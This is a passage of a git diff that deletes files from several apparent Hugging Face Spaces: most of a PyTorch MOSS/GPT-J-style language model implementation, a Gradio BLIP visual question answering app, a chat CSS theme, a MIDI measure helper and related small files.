1::2] - x = torch.stack((-x2, x1), dim=-1) - return x.flatten(-2) # in einsum notation: rearrange(x, '... d j -> ... (d j)') - - -# Copied from transformers.models.gptj.modeling_gptj.apply_rotary_pos_emb -def apply_rotary_pos_emb(tensor: torch.Tensor, sin: torch.Tensor, cos: torch.Tensor) -> torch.Tensor: - sin = torch.repeat_interleave(sin[:, :, None, :], 2, 3) - cos = torch.repeat_interleave(cos[:, :, None, :], 2, 3) - return (tensor * cos) + (rotate_every_two(tensor) * sin) - - -class MossAttention(nn.Module): - def __init__(self, config): - super().__init__() - - max_positions = config.max_position_embeddings - self.register_buffer( - "causal_mask", - torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view( - 1, 1, max_positions, max_positions - ), - ) - - self.attn_dropout = nn.Dropout(config.attn_pdrop) - self.resid_dropout = nn.Dropout(config.resid_pdrop) - - self.embed_dim = config.hidden_size - self.num_attention_heads = config.num_attention_heads - self.head_dim = self.embed_dim // self.num_attention_heads - if self.head_dim * self.num_attention_heads != self.embed_dim: - raise ValueError( - f"embed_dim must be divisible by num_attention_heads (got `embed_dim`: {self.embed_dim} and" - f" `num_attention_heads`: {self.num_attention_heads})." 
- ) - self.scale_attn = torch.sqrt(torch.tensor(self.head_dim, dtype=torch.float32)).to(torch.get_default_dtype()) - self.qkv_proj = nn.Linear(self.embed_dim, self.embed_dim * 3, bias=False) - - self.out_proj = nn.Linear(self.embed_dim, self.embed_dim, bias=False) - self.rotary_dim = config.rotary_dim - pos_embd_dim = self.rotary_dim or self.embed_dim - self.embed_positions = create_sinusoidal_positions(max_positions, pos_embd_dim) - - def _split_heads(self, x, n_head, dim_head, mp_num): - reshaped = x.reshape(x.shape[:-1] + (n_head // mp_num, dim_head)) - reshaped = reshaped.reshape(x.shape[:-2] + (-1,) + reshaped.shape[-1:]) - return reshaped - - def _merge_heads(self, tensor, num_attention_heads, attn_head_size): - """ - Merges attn_head_size dim and num_attn_heads dim into n_ctx - """ - if len(tensor.shape) == 5: - tensor = tensor.permute(0, 1, 3, 2, 4).contiguous() - elif len(tensor.shape) == 4: - tensor = tensor.permute(0, 2, 1, 3).contiguous() - else: - raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}") - new_shape = tensor.size()[:-2] + (num_attention_heads * attn_head_size,) - return tensor.view(new_shape) - - def _attn( - self, - query, - key, - value, - attention_mask=None, - head_mask=None, - ): - # compute causal mask from causal mask buffer - query_length, key_length = query.size(-2), key.size(-2) - causal_mask = self.causal_mask[:, :, key_length - query_length : key_length, :key_length] - - # Keep the attention weights computation in fp32 to avoid overflow issues - query = query.to(torch.float32) - key = key.to(torch.float32) - - attn_weights = torch.matmul(query, key.transpose(-1, -2)) - - attn_weights = attn_weights / self.scale_attn - mask_value = torch.finfo(attn_weights.dtype).min - # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`. 
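#        A minimal toy sketch of this masking pattern (names below are illustrative only, not used by this class):
#          scores = torch.randn(1, 1, 4, 4)                                    # [batch, heads, q_len, k_len]
#          causal = torch.tril(torch.ones(4, 4, dtype=torch.bool))             # True on and below the diagonal
#          fill = torch.tensor(torch.finfo(scores.dtype).min, dtype=scores.dtype, device=scores.device)
#          masked = torch.where(causal, scores, fill)                          # future positions get dtype-min before softmax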
- # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device` - mask_value = torch.tensor(mask_value, dtype=attn_weights.dtype).to(attn_weights.device) - attn_weights = torch.where(causal_mask, attn_weights, mask_value) - - if attention_mask is not None: - # Apply the attention mask - attn_weights = attn_weights + attention_mask - - attn_weights = nn.Softmax(dim=-1)(attn_weights) - attn_weights = attn_weights.to(value.dtype) - attn_weights = self.attn_dropout(attn_weights) - - # Mask heads if we want to - if head_mask is not None: - attn_weights = attn_weights * head_mask - - attn_output = torch.matmul(attn_weights, value) - - return attn_output, attn_weights - - def forward( - self, - hidden_states: Optional[torch.FloatTensor], - layer_past: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = False, - output_attentions: Optional[bool] = False, - ) -> Union[ - Tuple[torch.Tensor, Tuple[torch.Tensor]], - Optional[Tuple[torch.Tensor, Tuple[torch.Tensor], Tuple[torch.Tensor, ...]]], - ]: - qkv = self.qkv_proj(hidden_states) - # TODO(enijkamp): factor out number of logical TPU-v4 cores or make forward pass agnostic - mp_num = 4 - qkv_split = qkv.reshape(qkv.shape[:-1] + (mp_num, -1)) - - local_dim = self.head_dim * self.num_attention_heads // mp_num - query, value, key = torch.split(qkv_split, local_dim, dim=-1) - query = self._split_heads(query, self.num_attention_heads, self.head_dim, mp_num=mp_num) - key = self._split_heads(key, self.num_attention_heads, self.head_dim, mp_num=mp_num) - - value = self._split_heads(value, self.num_attention_heads, self.head_dim, mp_num=mp_num) - value = value.permute(0, 2, 1, 3) - - embed_positions = self.embed_positions - if embed_positions.device != position_ids.device: - embed_positions = embed_positions.to(position_ids.device) - self.embed_positions = embed_positions - - sincos = embed_positions[position_ids] - sin, cos = torch.split(sincos, sincos.shape[-1] // 2, dim=-1) - - if self.rotary_dim is not None: - k_rot = key[:, :, :, : self.rotary_dim] - k_pass = key[:, :, :, self.rotary_dim :] - - q_rot = query[:, :, :, : self.rotary_dim] - q_pass = query[:, :, :, self.rotary_dim :] - - k_rot = apply_rotary_pos_emb(k_rot, sin, cos) - q_rot = apply_rotary_pos_emb(q_rot, sin, cos) - - key = torch.cat([k_rot, k_pass], dim=-1) - query = torch.cat([q_rot, q_pass], dim=-1) - else: - key = apply_rotary_pos_emb(key, sin, cos) - query = apply_rotary_pos_emb(query, sin, cos) - - key = key.permute(0, 2, 1, 3) - query = query.permute(0, 2, 1, 3) - - if layer_past is not None: - past_key = layer_past[0] - past_value = layer_past[1] - key = torch.cat((past_key, key), dim=-2) - value = torch.cat((past_value, value), dim=-2) - - if use_cache is True: - present = (key, value) - else: - present = None - - # compute self-attention: V x Softmax(QK^T) - attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask) - - attn_output = self._merge_heads(attn_output, self.num_attention_heads, self.head_dim) - attn_output = self.out_proj(attn_output) - attn_output = self.resid_dropout(attn_output) - - outputs = (attn_output, present) - if output_attentions: - outputs += (attn_weights,) - - return outputs # a, present, (attentions) - - -# Copied from transformers.models.gptj.modeling_gptj.GPTJMLP with GPTJ->Moss -class MossMLP(nn.Module): - def __init__(self, 
intermediate_size, config): # in MLP: intermediate_size= 4 * embed_dim - super().__init__() - embed_dim = config.n_embd - - self.fc_in = nn.Linear(embed_dim, intermediate_size) - self.fc_out = nn.Linear(intermediate_size, embed_dim) - - self.act = ACT2FN[config.activation_function] - self.dropout = nn.Dropout(config.resid_pdrop) - - def forward(self, hidden_states: Optional[torch.FloatTensor]) -> torch.FloatTensor: - hidden_states = self.fc_in(hidden_states) - hidden_states = self.act(hidden_states) - hidden_states = self.fc_out(hidden_states) - hidden_states = self.dropout(hidden_states) - return hidden_states - - -# Copied from transformers.models.gptj.modeling_gptj.GPTJBlock with GPTJ->Moss -class MossBlock(nn.Module): - def __init__(self, config): - super().__init__() - inner_dim = config.n_inner if config.n_inner is not None else 4 * config.n_embd - self.ln_1 = nn.LayerNorm(config.n_embd, eps=config.layer_norm_epsilon) - self.attn = MossAttention(config) - self.mlp = MossMLP(inner_dim, config) - - def forward( - self, - hidden_states: Optional[torch.FloatTensor], - layer_past: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = False, - output_attentions: Optional[bool] = False, - ) -> Union[Tuple[torch.Tensor], Optional[Tuple[torch.Tensor, Tuple[torch.FloatTensor, ...]]]]: - residual = hidden_states - hidden_states = self.ln_1(hidden_states) - attn_outputs = self.attn( - hidden_states=hidden_states, - layer_past=layer_past, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask, - use_cache=use_cache, - output_attentions=output_attentions, - ) - attn_output = attn_outputs[0] # output_attn: a, present, (attentions) - outputs = attn_outputs[1:] - - feed_forward_hidden_states = self.mlp(hidden_states) - hidden_states = attn_output + feed_forward_hidden_states + residual - - if use_cache: - outputs = (hidden_states,) + outputs - else: - outputs = (hidden_states,) + outputs[1:] - - return outputs # hidden_states, present, (attentions) - - -class MossPreTrainedModel(PreTrainedModel): - """ - An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained - models. - """ - - config_class = MossConfig - base_model_prefix = "transformer" - supports_gradient_checkpointing = True - _no_split_modules = ["MossBlock"] - - def __init__(self, *inputs, **kwargs): - super().__init__(*inputs, **kwargs) - - def _init_weights(self, module): - """Initialize the weights.""" - if isinstance(module, (nn.Linear,)): - # Slightly different from Mesh Transformer JAX which uses truncated_normal for initialization - # cf https://github.com/pytorch/pytorch/pull/5617 - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - elif isinstance(module, nn.LayerNorm): - module.bias.data.zero_() - module.weight.data.fill_(1.0) - - def _set_gradient_checkpointing(self, module, value=False): - if isinstance(module, MossModel): - module.gradient_checkpointing = value - - -MOSS_START_DOCSTRING = r""" - This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. 
Use - it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and - behavior. - - Parameters: - config ([`MossConfig`]): Model configuration class with all the parameters of the model. - Initializing with a config file does not load the weights associated with the model, only the - configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -MOSS_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `({0})`): - Indices of input sequence tokens in the vocabulary. - - Indices can be obtained using [`AutoProcenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*): - Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0, - 1]`: - - - 0 corresponds to a *sentence A* token, - - 1 corresponds to a *sentence B* token. - - [What are token type IDs?](../glossary#token-type-ids) - position_ids (`torch.LongTensor` of shape `({0})`, *optional*): - Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0, - config.n_positions - 1]`. - - [What are position IDs?](../glossary#position-ids) - head_mask (`torch.FloatTensor` of shape `(num_attention_heads,)` or `(n_layer, num_attention_heads)`, *optional*): - Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_dim)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This - is useful if you want more control over how to convert *input_ids* indices into associated vectors than the - model's internal embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. 
-""" - - -@add_start_docstrings( - "The bare Moss Model transformer outputting raw hidden-states without any specific head on top.", - MOSS_START_DOCSTRING, -) -class MossModel(MossPreTrainedModel): - def __init__(self, config): - super().__init__(config) - - self.embed_dim = config.n_embd - self.vocab_size = config.vocab_size - self.wte = nn.Embedding(config.vocab_size, self.embed_dim) - self.drop = nn.Dropout(config.embd_pdrop) - self.h = nn.ModuleList([MossBlock(config) for _ in range(config.n_layer)]) - self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon) - self.rotary_dim = min(config.rotary_dim, config.n_ctx // config.num_attention_heads) - - self.gradient_checkpointing = False - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.wte - - def set_input_embeddings(self, new_embeddings): - self.wte = new_embeddings - - @add_start_docstrings_to_model_forward(MOSS_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=BaseModelOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - token_type_ids: Optional[torch.LongTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutputWithPast]: - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - input_shape = input_ids.size() - input_ids = input_ids.view(-1, input_shape[-1]) - batch_size = input_ids.shape[0] - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - batch_size = inputs_embeds.shape[0] - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - device = input_ids.device if input_ids is not None else inputs_embeds.device - - if token_type_ids is not None: - token_type_ids = token_type_ids.view(-1, input_shape[-1]) - - if position_ids is not None: - position_ids = position_ids.view(-1, input_shape[-1]).long() - - if past_key_values is None: - past_length = 0 - past_key_values = tuple([None] * len(self.h)) - else: - past_length = past_key_values[0][0].size(-2) - - if position_ids is None: - position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device) - position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1]) - - # Attention mask. - if attention_mask is not None: - if batch_size <= 0: - raise ValueError("batch_size has to be defined and > 0") - attention_mask = attention_mask.view(batch_size, -1) - # We create a 3D attention mask from a 2D tensor mask. 
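#        Toy example of this conversion (illustrative values): a 2D mask [[1, 1, 0]] ends up as an additive bias
#        [[[[0., 0., finfo.min]]]], so the padded position contributes essentially zero probability after softmax.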
- # Sizes are [batch_size, 1, 1, to_seq_length] - # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length] - # this attention mask is more simple than the triangular masking of causal attention - # used in OpenAI GPT, we just need to prepare the broadcast dimension here. - attention_mask = attention_mask[:, None, None, :] - - # Since attention_mask is 1.0 for positions we want to attend and 0.0 for - # masked positions, this operation will create a tensor which is 0.0 for - # positions we want to attend and the dtype's smallest value for masked positions. - # Since we are adding it to the raw scores before the softmax, this is - # effectively the same as removing these entirely. - attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility - attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min - - # Prepare head mask if needed - # 1.0 in head_mask indicate we keep the head - # attention_probs has shape bsz x num_attention_heads x N x N - # head_mask has shape n_layer x batch x num_attention_heads x N x N - head_mask = self.get_head_mask(head_mask, self.config.n_layer) - - if inputs_embeds is None: - inputs_embeds = self.wte(input_ids) - - hidden_states = inputs_embeds - - if token_type_ids is not None: - token_type_embeds = self.wte(token_type_ids) - hidden_states = hidden_states + token_type_embeds - - hidden_states = self.drop(hidden_states) - - output_shape = input_shape + (hidden_states.size(-1),) - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting " - "`use_cache=False`..." - ) - use_cache = False - - presents = () if use_cache else None - all_self_attentions = () if output_attentions else None - all_hidden_states = () if output_hidden_states else None - for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)): - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, use_cache, output_attentions) - - return custom_forward - - outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(block), - hidden_states, - None, - attention_mask, - position_ids, - head_mask[i], - ) - else: - outputs = block( - hidden_states=hidden_states, - layer_past=layer_past, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask[i], - use_cache=use_cache, - output_attentions=output_attentions, - ) - - hidden_states = outputs[0] - if use_cache is True: - presents = presents + (outputs[1],) - - if output_attentions: - all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],) - - hidden_states = self.ln_f(hidden_states) - - hidden_states = hidden_states.view(output_shape) - # Add last hidden state - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None) - - return BaseModelOutputWithPast( - last_hidden_state=hidden_states, - past_key_values=presents, - hidden_states=all_hidden_states, - attentions=all_self_attentions, - ) - - -@add_start_docstrings( - """ - The Moss Model transformer with a language modeling head on top. 
- """, - MOSS_START_DOCSTRING, -) -class MossForCausalLM(MossPreTrainedModel): - _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.causal_mask"] - - def __init__(self, config): - super().__init__(config) - self.transformer = MossModel(config) - self.lm_head = nn.Linear(config.n_embd, config.vocab_size) - - # Initialize weights and apply final processing - self.post_init() - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def prepare_inputs_for_generation(self, input_ids, past_key_values=None, **kwargs): - token_type_ids = kwargs.get("token_type_ids", None) - # only last token for inputs_ids if past is defined in kwargs - if past_key_values: - input_ids = input_ids[:, -1].unsqueeze(-1) - if token_type_ids is not None: - token_type_ids = token_type_ids[:, -1].unsqueeze(-1) - - attention_mask = kwargs.get("attention_mask", None) - position_ids = kwargs.get("position_ids", None) - - if attention_mask is not None and position_ids is None: - # create position_ids on the fly for batch generation - position_ids = attention_mask.long().cumsum(-1) - 1 - position_ids.masked_fill_(attention_mask == 0, 1) - if past_key_values: - position_ids = position_ids[:, -1].unsqueeze(-1) - - return { - "input_ids": input_ids, - "past_key_values": past_key_values, - "use_cache": kwargs.get("use_cache"), - "position_ids": position_ids, - "attention_mask": attention_mask, - "token_type_ids": token_type_ids, - } - - @add_start_docstrings_to_model_forward(MOSS_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=CausalLMOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - token_type_ids: Optional[torch.LongTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, CausalLMOutputWithPast]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. 
you can set - `labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100` - are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]` - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - token_type_ids=token_type_ids, - position_ids=position_ids, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = transformer_outputs[0] - - # make sure sampling in fp16 works correctly and - # compute loss in fp32 to match with mesh-tf version - # https://github.com/EleutherAI/gpt-neo/blob/89ce74164da2fb16179106f54e2269b5da8db333/models/gpt2/gpt2.py#L179 - lm_logits = self.lm_head(hidden_states).to(torch.float32) - - loss = None - if labels is not None: - # Shift so that tokens < n predict n - shift_logits = lm_logits[..., :-1, :].contiguous() - shift_labels = labels[..., 1:].contiguous() - # Flatten the tokens - loss_fct = CrossEntropyLoss() - loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1)) - - loss = loss.to(hidden_states.dtype) - - if not return_dict: - output = (lm_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return CausalLMOutputWithPast( - loss=loss, - logits=lm_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - @staticmethod - def _reorder_cache( - past_key_values: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor - ) -> Tuple[Tuple[torch.Tensor]]: - """ - This function is used to re-order the `past_key_values` cache if [`~PretrainedModel.beam_search`] or - [`~PretrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct - beam_idx at every generation step. 
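        For example (illustrative values), with `beam_idx = torch.tensor([2, 0, 1])` every cached key/value tensor is
        re-indexed along its batch dimension, so entry 0 of the reordered cache holds what was previously entry 2.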
- """ - return tuple( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past) - for layer_past in past_key_values - ) diff --git a/spaces/xuyingliKepler/autogenchat/README.md b/spaces/xuyingliKepler/autogenchat/README.md deleted file mode 100644 index 92b04fa200aeab6172b7d5c06b202a70be33b984..0000000000000000000000000000000000000000 --- a/spaces/xuyingliKepler/autogenchat/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Autogenchat -emoji: 🐢 -colorFrom: gray -colorTo: red -sdk: streamlit -sdk_version: 1.28.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/xxx1/vqa_blip_large/app.py b/spaces/xxx1/vqa_blip_large/app.py deleted file mode 100644 index 51181e4c1f3f6c37f14613eb628abce1d6076577..0000000000000000000000000000000000000000 --- a/spaces/xxx1/vqa_blip_large/app.py +++ /dev/null @@ -1,82 +0,0 @@ -import string -import gradio as gr -import requests -import torch - - -from transformers import BlipForQuestionAnswering, BlipProcessor - -device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -processor = BlipProcessor.from_pretrained("Salesforce/blip-vqa-capfilt-large") -model_vqa = BlipForQuestionAnswering.from_pretrained("Salesforce/blip-vqa-capfilt-large").to(device) -def inference_chat(input_image,input_text): - inputs = processor(images=input_image, text=input_text,return_tensors="pt") - inputs["max_length"] = 20 - inputs["num_beams"] = 5 - out = model_vqa.generate(**inputs) - return processor.batch_decode(out, skip_special_tokens=True)[0] - -with gr.Blocks( - css=""" - .message.svelte-w6rprc.svelte-w6rprc.svelte-w6rprc {font-size: 20px; margin-top: 20px} - #component-21 > div.wrap.svelte-w6rprc {height: 600px;} - """ -) as iface: - state = gr.State([]) - #caption_output = None - #gr.Markdown(title) - #gr.Markdown(description) - #gr.Markdown(article) - - with gr.Row(): - with gr.Column(scale=1): - image_input = gr.Image(type="pil") - with gr.Row(): - with gr.Column(scale=1): - chat_input = gr.Textbox(lines=1, label="VQA Input(问题输入)") - with gr.Row(): - clear_button = gr.Button(value="Clear", interactive=True) - submit_button = gr.Button( - value="Submit", interactive=True, variant="primary" - ) - with gr.Column(): - caption_output = gr.Textbox(lines=0, label="VQA Output(模型答案输出)") - - - image_input.change( - lambda: ("", "", []), - [], - [ caption_output, state], - queue=False, - ) - chat_input.submit( - inference_chat, - [ - image_input, - chat_input, - ], - [ caption_output], - ) - clear_button.click( - lambda: ("", [], []), - [], - [chat_input, state], - queue=False, - ) - submit_button.click( - inference_chat, - [ - image_input, - chat_input, - ], - [caption_output], - ) - - # examples = gr.Examples( - # examples=examples, - # inputs=[image_input, chat_input], - # ) - -iface.queue(concurrency_count=1, api_open=False, max_size=10) -iface.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py b/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py deleted file mode 100644 index 20d7df4af5007ba1b14bae40118fbd3fbe61f759..0000000000000000000000000000000000000000 --- a/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -import importlib -from basicsr.utils import scandir -from os import path as osp - -# 
automatically scan and import dataset modules for registry -# scan all the files that end with '_dataset.py' under the data folder -data_folder = osp.dirname(osp.abspath(__file__)) -dataset_filenames = [ - osp.splitext(osp.basename(v))[0] - for v in scandir(data_folder) - if v.endswith("_dataset.py") -] -# import all the dataset modules -_dataset_modules = [ - importlib.import_module(f"realesrgan.data.{file_name}") - for file_name in dataset_filenames -] diff --git a/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css b/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css deleted file mode 100644 index 7682011d7e9d9de4b9ee013ba9b92b71548df639..0000000000000000000000000000000000000000 --- a/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css +++ /dev/null @@ -1,107 +0,0 @@ -/* All credits to TheEncrypted777: https://www.reddit.com/r/Oobabooga/comments/12xe6vq/updated_css_styling_with_color_customization_for/ */ - -.message { - display: grid; - grid-template-columns: 60px minmax(0, 1fr); - padding-bottom: 28px; - font-size: 18px; - /*Change 'Quicksand' to a font you like or leave it*/ - font-family: Quicksand, Arial, sans-serif; - line-height: 1.428571429; -} - -.circle-you { - background-color: gray; - border-radius: 1rem; - /*Change color to any you like to be the border of your image*/ - border: 2px solid white; -} - -.circle-bot { - background-color: gray; - border-radius: 1rem; - /*Change color to any you like to be the border of the bot's image*/ - border: 2px solid white; -} - -.circle-bot img, -.circle-you img { - border-radius: 10%; - width: 100%; - height: 100%; - object-fit: cover; -} - -.circle-you, .circle-bot { - /*You can set the size of the profile images here, but if you do, you have to also adjust the .text{padding-left: 90px} to a different number according to the width of the image which is right below here*/ - width: 135px; - height: 175px; -} - -.text { - /*Change this to move the message box further left or right depending on the size of your profile pic*/ - padding-left: 90px; - text-shadow: 2px 2px 2px rgb(0, 0, 0); -} - -.text p { - margin-top: 2px; -} - -.username { - padding-left: 10px; - font-size: 22px; - font-weight: bold; - border-top: 1px solid rgb(51, 64, 90); - padding: 3px; -} - -.message-body { - position: relative; - border-radius: 1rem; - border: 1px solid rgba(255, 255, 255, 0.459); - border-radius: 10px; - padding: 10px; - padding-top: 5px; - /*Message gradient background color - remove the line bellow if you don't want a background color or gradient*/ - background: linear-gradient(to bottom, #171730, #1b263f); -} - - /*Adds 2 extra lines at the top and bottom of the message*/ -.message-body:before, - .message-body:after { - content: ""; - position: absolute; - left: 10px; - right: 10px; - height: 1px; - background-color: rgba(255, 255, 255, 0.13); -} - -.message-body:before { - top: 6px; -} - -.message-body:after { - bottom: 6px; -} - -.message-body img { - max-width: 300px; - max-height: 300px; - border-radius: 20px; -} - -.message-body p { - margin-bottom: 0 !important; - font-size: 18px !important; - line-height: 1.428571429 !important; -} - -.dark .message-body p em { - color: rgb(138, 138, 138) !important; -} - -.message-body p em { - color: rgb(110, 110, 110) !important; -} diff --git a/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts b/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts deleted file mode 100644 index 
a0078808592ada4a53cf6e300e55d126e6d4b2c0..0000000000000000000000000000000000000000 --- a/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts +++ /dev/null @@ -1,34 +0,0 @@ -import maxBy from "lodash/maxBy" -import { isTimeSignatureEvent } from "../track" -import Song from "./Song" - -export const getMeasureStart = (song: Song, tick: number) => { - if (song.conductorTrack === undefined) { - return null - } - - // get the nearest time signature - const timeSignature = maxBy( - song.conductorTrack.events - .filter(isTimeSignatureEvent) - .slice() - .filter((e) => e.tick <= tick), - (e) => e.tick, - ) - - if (timeSignature === undefined) { - return null - } - - // calculate the nearest measure beginning - const ticksPerMeasure = - ((song.timebase * 4) / timeSignature.denominator) * timeSignature.numerator - const numberOfMeasures = Math.floor( - (tick - timeSignature.tick) / ticksPerMeasure, - ) - - return { - tick: timeSignature.tick + numberOfMeasures * ticksPerMeasure, - timeSignature, - } -} diff --git a/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py b/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py deleted file mode 100644 index 07ebab7f41f6466f6f46130002e2e0df1266486a..0000000000000000000000000000000000000000 --- a/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py +++ /dev/null @@ -1,250 +0,0 @@ -''' - * Copyright (c) 2022, salesforce.com, inc. - * All rights reserved. - * SPDX-License-Identifier: BSD-3-Clause - * For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause - * By Junnan Li -''' -import argparse -import os -import ruamel_yaml as yaml -import numpy as np -import random -import time -import datetime -import json -from pathlib import Path - 